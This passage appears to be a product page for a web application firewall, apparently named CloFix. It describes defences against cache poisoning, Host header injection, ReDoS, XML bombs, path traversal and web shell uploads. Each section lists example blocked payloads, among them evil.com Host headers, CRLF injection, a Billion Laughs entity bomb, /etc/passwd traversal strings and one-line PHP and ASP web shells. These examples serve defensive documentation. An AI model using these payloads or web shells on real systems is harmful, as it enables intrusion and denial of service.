- X-Rewrite-URL: Path-based cache poisoning
- X-Forwarded-Path: Alternative path injection
- X-Forwarded-Port: Port-based cache variation
- X-Forwarded-Proto: HTTP/HTTPS cache confusion
- X-Forwarded-Scheme: Protocol mismatch attacks
- X-Original-Host: Alternate host injection
- X-Forwarded-For: Cache key manipulation via IP
- X-Real-IP: Client IP cache poisoning
- X-Custom-Header: Unkeyed header injection
- Vary Header Abuse: Cache DoS via varying headers
π‘οΈ Protection Mechanisms
- Header Normalization & Validation
- Cache Key Normalization (remove unkeyed headers)
- Dangerous Header Stripping
- X-Forwarded Header Sanitization
- Cache Response Validation
- Duplicate Header Detection & Blocking
- Header Length Limiting
- Cache Purge Request Validation
- Cache-Key Whitelisting
- Response Variant Analysis
βοΈ Protected Headers Automatically Stripped
X-Forwarded-Host,X-Forwarded-Path,X-Forwarded-PortX-Original-URL,X-Rewrite-URL,X-Original-HostX-Forwarded-Server,X-Proxy-Host,X-Real-IPX-Forwarded-For(only first IP preserved for logs)- Custom unkeyed headers configurable
π Example Attack Blocked
GET / HTTP/1.1
Host: vulnerable.com
X-Forwarded-Host: evil.com
GET /admin/users HTTP/1.1
X-Original-URL: /index.html
X-Rewrite-URL: /cache-buster
GET /products/123 HTTP/1.1
X-Forwarded-Path: /malicious
Cache-Control: public, max-age=3600
π Host Header Injection Protection
Prevents password reset poisoning, cache poisoning, and virtual host bypass attacks
Blocks attackers from manipulating the Host header to poison password reset links, bypass virtual host routing, and launch web cache deception attacks.
π― Attack Vectors Blocked
- Password Reset Poisoning: Host header modified to point to attacker domain
- Cache Poisoning: Malicious host header cached by CDN/proxy
- Virtual Host Bypass: Access restricted vhosts via host header
- Web Cache Deception: Host variation causing cache mismatch
- XSS via Host Reflection: Malicious script in host header
- DNS Rebinding: Host header pointing to internal IPs
- Port Injection:
example.com:8080bypassing port restrictions - Localhost Attack:
127.0.0.1,localhosthost values - Line-Feed Injection:
%0d%0aHTTP response splitting - Duplicate Host Header: Multiple Host headers causing ambiguity
π‘οΈ Protection Mechanisms
- Host Whitelist Validation (against configured domains)
- Port Stripping & Validation
- localhost/Private IP Blocking (127.0.0.1, 0.0.0.0, ::1, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16)
- Duplicate Host Header Rejection
- CRLF Injection Prevention (
\r\n,%0d%0a,%0a%0d) - Null Byte Detection (
%00,\x00) - Path Traversal Detection (
../,..%2f) - Host Length Validation (max 255 chars)
- Allowed Character Whitelist (a-z, 0-9, ., -, :)
- Automated Host Normalization
βοΈ Configuration Options
- Allowed Domains List (primary + aliases)
- Block Private IPs (toggle)
- Block Localhost (toggle)
- Strip Port from Host (toggle)
- Case-Sensitive Validation (off by default)
π Example Blocked Requests
POST /reset-password HTTP/1.1
Host: evil.com
Content-Type: application/json
{"email": "victim@example.com"}
GET /admin HTTP/1.1
Host: 127.0.0.1
GET /%0d%0aX-Forwarded-Host:evil.com HTTP/1.1
Host: vulnerable.com
Host: vulnerable.com
Host: evil.com
Host: vulnerable.com
β±οΈ Regular Expression Denial of Service (ReDoS) Protection
Blocks catastrophic regex input patterns targeting vulnerable regex implementations
Prevents ReDoS attacks that exploit inefficient regular expressions with catastrophic backtracking to freeze or crash the server.
π― Attack Patterns Detected
- Nested Quantifiers:
(a+)+,(a*)*,(a?)? - Overlapping Alternations:
(a|a)+,(a|aa)+ - Long Repetitions:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawith nested patterns - Repeated Groups:
(a+)*$,(.*)* - Evil Regex Patterns:
^(([a-z])+.)+[A-Z]([a-z])+$ - Polynomial Time Patterns:
(a|aa)+b,(a|a)+b - Exponential Time Patterns:
(a+)+$,([a-zA-Z]+)*$ - Long Strings with Repetition:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa - Known ReDoS Payloads: From OWASP ReDoS list
- Low Character Variety + High Length: High entropy + repeating patterns
π‘οΈ Detection Techniques
- Input Length Validation (max 10,000 chars default)
- Character Variety Analysis (low variety = suspicious)
- Repetition Pattern Detection (run-length encoding)
- Nested Pattern Matching (regex token parsing)
- Execution Timeouts (prevent DoS at runtime)
- Memory Usage Monitoring (abort excessive allocations)
- Known ReDoS Payload Database
- Adaptive Rate Limiting (throttle on detection)
- Automated Regex Static Analysis (pre-filter dangerous patterns)
βοΈ Protection Thresholds
- Max Input Length: 10,000 characters (configurable)
- Max Repetition Count: 50 consecutive same chars
- Low Variety Threshold: < 5 unique chars in input
- Execution Timeout: 100ms per regex operation
- Block Threshold: Attack score β₯ 8/10
π Example Blocked Payloads
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
(a+)+b pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab
(a*)* pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(a|a)+ pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
([a-zA-Z]+)*$ pattern: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
π£ XML Bomb (Billion Laughs) Protection
Prevents quadratic blowup and entity expansion attacks in XML documents
Blocks XML denial-of-service attacks using entity expansion, nested entities, and external entity references (Billion Laughs, Quadratic Blowup).
π― Attack Types Blocked
- Billion Laughs Attack: Recursive entity expansion
- Quadratic Blowup: Large entity references causing memory exhaustion
- External Entity Expansion (XXE): File inclusion with expansion
- Deep Nesting: Highly nested XML elements
- Attribute Bomb: Excessive attributes per element
- Large CDATA Sections: Oversized character data
- XML Declaration Bomb: Large encoding declarations
- Namespace Bomb: Excessive XML namespaces
π‘οΈ Protection Mechanisms
- Disable External Entity Resolution
- Disable DTD Processing (security-focused parsing)
- Entity Expansion Limit (max 10,000 expansions)
- Nested Entity Limit (max depth 10)
- Max Element Depth (max 100 levels)
- Max Attributes per Element (max 50)
- Max Content Length (configurable)
- Max CDATA Section Size (1MB default)
- Max Entity Parameter Count (max 100)
- Strict XML Parsing Mode
- Memory Usage Limits
- Processing Timeout (5 seconds max)
βοΈ Safe XML Parsing Configuration
decoder := xml.NewDecoder(bytes.NewReader(body))
decoder.Strict = true
decoder.Entity = map[string]string{} // Empty = no entities
decoder.CharsetReader = nil // Prevent charset attacks
π Example Attack Payloads
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;">
...
<!ENTITY lol9 "&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
π Path Normalization Protection
Blocks path traversal bypasses using URL encoding, Unicode, and double encoding tricks
Prevents attackers from bypassing path-based access controls using URL encoding, Unicode normalization, null bytes, and double encoding tricks.
π― Attack Patterns Blocked
- Basic Path Traversal:
../,..\\,.../ - URL Encoded:
%2e%2e%2f,%2e%2e/ - Double Encoding:
%252e%252e%252f,%252e%252e/ - Unicode Normalization:
%c0%ae%c0%ae%c0%af(overlong UTF-8) - Null Byte Injection:
file.php%00.jpg,..%00/ - Mixed Slashes:
..\\../,..//../ - Directory Self-Reference:
/./././etc/passwd - Parent Directory Repetition:
....//....//....//etc/passwd - Hex Encoding:
%2E%2E%2F(uppercase/lowercase mix) - Backslash Variants:
..%5c(Windows path separator) - UTF-16 Encoding:
%ff%fe%2e%00%2e%00%2f%00 - Path Prefix Bypass:
/var/www/../../../etc/passwd
π‘οΈ Protection Mechanisms
- Multi-layer URL Decoding (3-pass decode)
- Unicode Normalization (NFC/NFKD)
- Path Canonicalization (
path.Clean()) - Null Byte Stripping
- Character Whitelist Validation
- Base Path Enforcement (chroot-style)
- Forbidden Pattern Detection
- Sensitive Path Blacklisting (
/etc/passwd,/proc/,/root/) - Backslash to Forward Slash Conversion
- Double Path Clean Validation
π Example Blocked Paths
../../../etc/passwd
..%252f..%252f..%252fetc/passwd
....//....//....//etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/var/www/../../../../etc/shadow
/..%c0%af..%c0%af..%c0%afetc/passwd
π Web Shell Upload Protection
Detects and blocks web shell uploads including c99, r57, b374k, and China Chopper signatures
Prevents attackers from uploading web shells (backdoor scripts) that provide remote access and command execution on the server.
π― Detected Web Shell Types
- c99 Shell:
c99.php,c99_madridvariants - r57 Shell:
r57.php,r57shellvariants - b374k Shell:
b374k.php,b374k-minivariants - China Chopper:
caidao.asp,caidao.php - WSO (Web Shell by oRb):
wso.php,webshell.php - ShellBot: IRC bot shells
- PHP Simple Shell:
shell.php,cmd.php - ASPX Shell:
shell.aspx,cmd.aspx - JSP Shell:
shell.jsp,cmd.jsp - Perl/CGI Shell:
shell.cgi,cmd.pl - Python Shell:
shell.py,backdoor.py - Node.js Shell:
shell.js,backdoor.js
π Detection Signatures
- System Command Functions:
system(),exec(),shell_exec(),passthru(),popen() - File Manipulation:
file_put_contents(),fopen(),chmod() - Code Execution:
eval(),assert(),create_function() - Base64 Decoding:
base64_decode(),gzinflate(),str_rot13() - Known Shell Signatures:
$c99,$r57,b374k,wso_version - Obfuscation Patterns: Multiple nested functions, concatenated strings
- Web Shell User-Agents:
Mozilla/5.0 (Windows NT; r57shell) - Filename Patterns:
*shell*,*backdoor*,*cmd*
π‘οΈ Protection Techniques
- Content-based Signature Matching
- MIME Type Validation (text/plain disguised as image)
- File Extension Blacklist (.php, .phtml, .php3, .asp, .aspx, .jsp, .jspx, .cgi, .pl, .py)
- Double Extension Detection (
shell.jpg.php) - Null Byte Poisoning Prevention (
shell.php\x00.jpg) - Code Obfuscation Detection
- Function Call Whitelist
- Heuristic Analysis (unusual combinations of dangerous functions)
- Entropy Analysis (high entropy = suspicious for encoded payloads)
- Anti-Virus Scanning Integration (optional)
π« Blocked File Extensions
- PHP:
.php,.php3,.php4,.php5,.phtml,.phps - ASP:
.asp,.aspx,.ashx,.asmx,.asax - JSP:
.jsp,.jspx,.jws,.jsw - CGI/Perl:
.cgi,.pl,.pm - Python:
.py,.pyc - Ruby:
.rb,.rbw - Shell:
.sh,.bash,.zsh
π Example Web Shell Signatures Blocked
<?php eval($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php @assert($_POST['c']); ?>
<?= `$_GET[cmd]` ?>
<% eval request("cmd") %>
<%@ Page Language="Jscript" %><%eval(Request.Item["cmd"],"unsafe");%>
Additional Security Features
π Real-Time Alerts - Slack
Sends real-time security alerts and notifications to Slack channel
Sends real-time security alerts and notifications to Slack channels.
- Instant threat notifications
- Custom alert rules
- Incident reporting
- Team collaboration
π Lua Scripting Support
Custom security logic implementation using Lua scripting
Custom security logic implementation using Lua scripting for flexibility.
- Custom rule creation
- Dynamic response logic
- Integration capabilities
- Extensible architecture
π VPN Blocking
Detects and blocks requests from VPN services and proxies
Detects and blocks requests from VPN services and proxy networks.
- VPN IP detection
- Proxy server blocking
- Anonymizer detection
- Datacenter proxy filtering
π€ Bad Bot Blocking
Identifies and blocks malicious bot traffic
Identifies and blocks malicious bot traffic while allowing legitimate bots.
- Malicious bot detection
- Scraper blocking
- Credential stuffing prevention
- Automated attack mitigation
π± Agent UA Blocking
Blocks requests based on suspicious User-Agent strings
Blocks requests based on suspicious or malicious User-Agent strings.
- Suspicious UA detection
- Empty UA blocking
- Known malicious UA filtering
- Custom UA rules
π SEO Bot Analysis
Analyzes and validates legitimate search engine bots
Analyzes and validates legitimate search engine bots for SEO optimization.
- Googlebot verification
- Bingbot validation
- Reverse DNS checking
- Bot allowlisting
π Signatures Blocking
Blocks requests matching known attack signatures
Blocks requests matching known attack signatures from comprehensive databases.
- CVE signature matching
- Attack pattern detection
- Custom signature support
- Regular updates
π§ Tor Exit Node Monitor and Blocking
Monitors and blocks requests from Tor exit nodes
Monitors and blocks requests from Tor exit nodes with real-time updates.
- Tor network monitoring
- Exit node detection
- Anonymous traffic blocking
- Custom exemptions
π« IP Blocking
Blocks requests from specific IP addresses or IP ranges
Blocks requests from specific IP addresses or IP ranges with flexible rules.
- Single IP blocking
- CIDR range blocking
- Dynamic blacklisting
- Whitelist support
π Path Blocking
Blocks access to specific URL paths/directories
Blocks access to specific URL paths and directories for granular control.
- Sensitive path protection
- Admin area blocking
- Pattern-based blocking
- Exception handling
π¨ Headers Blocking
Blocks requests containing specific HTTP headers
Blocks requests containing specific HTTP headers or header patterns.
- Suspicious header filtering
- Header value validation
- Custom header rules
- Header injection prevention
π Hostname Blocking
Blocks requests based on hostname/domain
Blocks requests based on hostname or domain for virtual host protection.
- Domain-based filtering
- Subdomain blocking
- Referrer validation
- Host header protection
πΊοΈ Country Blocking
Blocks traffic from specific countries (geo-blocking)
Blocks traffic from specific countries with granular geo-blocking controls.
- Country-level filtering
- Region-based blocking
- GeoIP database integration
- Allow/block lists
π Body Content Blocking
Blocks requests containing specific patterns in request body
Blocks requests containing specific patterns in request body for deep inspection.
- POST data filtering
- JSON payload inspection
- XML content validation
- Malicious pattern detection
π Query Blocking
Blocks requests based on query string parameters
Blocks requests based on query string parameters and patterns.
- SQL injection detection
- XSS in query params
- Parameter pollution prevention
- Custom query filtering
π CloFix ID Blocking
Blocks specific CloFix identification patterns
Blocks specific CloFix identification patterns for advanced threat detection.
- ID pattern matching
- Fingerprint validation
- Custom ID blocking
- Anomaly detection
π’ ASN Blocking
Blocks traffic from specific Autonomous System Numbers
Blocks traffic from specific Autonomous System Numbers for network-level control.
- ASN-based filtering
- ISP/network blocking
- Cloud provider filtering
- Bogon ASN prevention